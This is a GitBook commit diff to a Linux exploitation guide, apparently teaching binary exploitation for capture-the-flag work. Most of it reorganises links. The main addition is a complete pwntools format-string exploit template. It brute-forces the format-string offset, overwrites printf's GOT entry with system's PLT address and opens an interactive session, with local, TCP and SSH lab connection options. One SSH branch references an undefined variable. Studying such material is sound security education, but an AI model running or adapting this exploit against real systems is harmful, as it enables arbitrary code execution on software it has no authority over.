GitBook: [master] 6 pages modified

SUMMARY.md

@@ -424,8 +424,10 @@
 ## Exploiting
 
 * [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
+  * [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
   * [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
   * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
+  * [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
   * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
   * [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md)
   * [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md)
@@ -462,7 +464,6 @@
   * [Magic Methods](misc/basic-python/magic-methods.md)
   * [Web Requests](misc/basic-python/web-requests.md)
   * [Bruteforce hash \(few chars\)](misc/basic-python/bruteforce-hash-few-chars.md)
-  * [ROP-PWN template](misc/basic-python/rop-pwn-template.md)
 * [Other Big References](misc/references.md)
 
 ## TODO

exploiting/linux-exploiting-basic-esp/README.md

@@ -400,6 +400,10 @@ Contiene las direcciones absolutas de las funciones que son utilizadas en un pro
 
 or using GEF you can start a debugging session and execute `got` to see the got table.
 
+You an find a **template** to exploit the GOT using format-strings here:
+
+{% page-ref page="format-string-template.md" %}
+
 #### **Exploit \(format strings\)**
 
 Si modificamos el valor de la dirección de una de estas funciones y apuntamos a una shellcode y esta función se ejecuta después del printf tendremos un exploit.

exploiting/linux-exploiting-basic-esp/format-string-template.md

@@ -0,0 +1,116 @@
+# Format String Template
+
+```python
+from pwn import *
+
+
+####################
+#### CONNECTION ####
+####################
+
+# Define how you want to exploit the binary
+LOCAL = True
+REMOTETTCP = False
+REMOTESSH = False
+GDB = False
+
+# Configure vulnerabily binary
+LOCAL_BIN = "./tyler"
+REMOTE_BIN = "./tyler" #For ssh
+
+# In order to exploit the format string you may need to append/prepend some string to the payload
+# configure them here
+PREFIX_PAYLOAD = b"echo "
+SUFFIX_PAYLOAD = b""
+
+def connect_binary():
+    global P, ELF_LOADED, ROP_LOADED
+
+    if LOCAL:
+        P = process(LOCAL_BIN) # start the vuln binary
+        ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+        ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+
+    elif REMOTETTCP:
+        P = remote('10.10.10.10',1338) # start the vuln binary
+        ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+        ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+
+    elif REMOTESSH:
+        ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
+        P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
+        ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+        ROP_LOADED = ROP(elf)# Find ROP gadgets
+
+    if GDB and not REMOTETTCP and not REMOTESSH:
+        # attach gdb and continue
+        # You can set breakpoints, for example "break *main"
+        gdb.attach(P.pid, "b *main")
+
+
+########################################
+#### Get format string configuration ###
+########################################
+
+def send_payload(payload):
+    payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
+    log.info("payload = %s" % repr(payload))
+    P.sendline(payload)
+    return P.recv()
+
+
+def get_formatstring_config():
+    global P
+
+    for offset in range(1,1000):
+        connect_binary()
+        P.clean()
+
+        payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
+        recieved = send_payload(payload).strip()
+
+        if b"41" in recieved:
+            for padlen in range(0,4):              
+                if b"41414141" in recieved:
+                    payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
+                    recieved = send_payload(payload).strip()
+                    print(recieved)
+                    if b"42424242" in recieved:
+                        log.info(f"Found offset ({offset}) and padlen ({padlen})")
+                        return offset, padlen
+                
+                else:
+                    payload = b" " + payload
+                    recieved = send_payload(payload).strip()
+
+
+# In order to exploit a format string you need to find a position where part of your payload
+# is being reflected. Then, you will be able to put in the position arbitrary addresses
+# and write arbitrary content in those addresses
+# Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string
+
+offset, padlen = get_formatstring_config()
+
+
+# In this template, the GOT of printf (the part of the GOT table that points to where the printf
+# function resides) is going to be modified by the address of the system inside the PLT (the
+# part of the code that will jump to the system function).
+# Therefore, next time the printf function is executed, system will be executed instead with the same
+# parameters passed to printf
+
+SYSTEM_PLT = ELF_LOADED.plt["system"]
+P_GOT = ELF_LOADED.got["printf"]
+log.info(f"System PLT address: {hex(SYSTEM_PLT)}")
+log.info(f"Printf GOT address: {hex(P_GOT)}")
+
+format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen)
+format_string.write(P_GOT, SYSTEM_PLT)
+format_string.execute_writes()
+
+
+# Now that printf function is executing system you just need to find a place where you can
+# control the parameters passed to printf to execute arbitrary code.
+
+P.interactive()
+```
+

exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md

@@ -34,7 +34,7 @@ gcc -o vuln vuln.c -fno-stack-protector  -no-pie
 
 ## ROP - PWNtools template
 
-\*\*\*\*[**Find my ROP-PWNtools template here.**](../../misc/basic-python/rop-pwn-template.md) I'm going to use the code located there to make the exploit.  
+\*\*\*\*[**Find my ROP-PWNtools template here.**](rop-pwn-template.md) I'm going to use the code located there to make the exploit.  
 Download the exploit and place it in the same directory as the vulnerable binary.
 
 ## 1- Finding the offset
@@ -251,9 +251,9 @@ rop2 = base + p64(ONE_GADGET) + "\x00"*100
 
 ## EXPLOIT FILE
 
-Here you have the final exploit after having performed all the necessary changes to the original [**template.py**](../../misc/basic-python/rop-pwn-template.md) **file**.
+You can find a template to exploit this vulnerability here:
 
-{% file src="../../.gitbook/assets/template.py" caption="template.py" %}
+{% page-ref page="rop-pwn-template.md" %}
 
 ## Common problems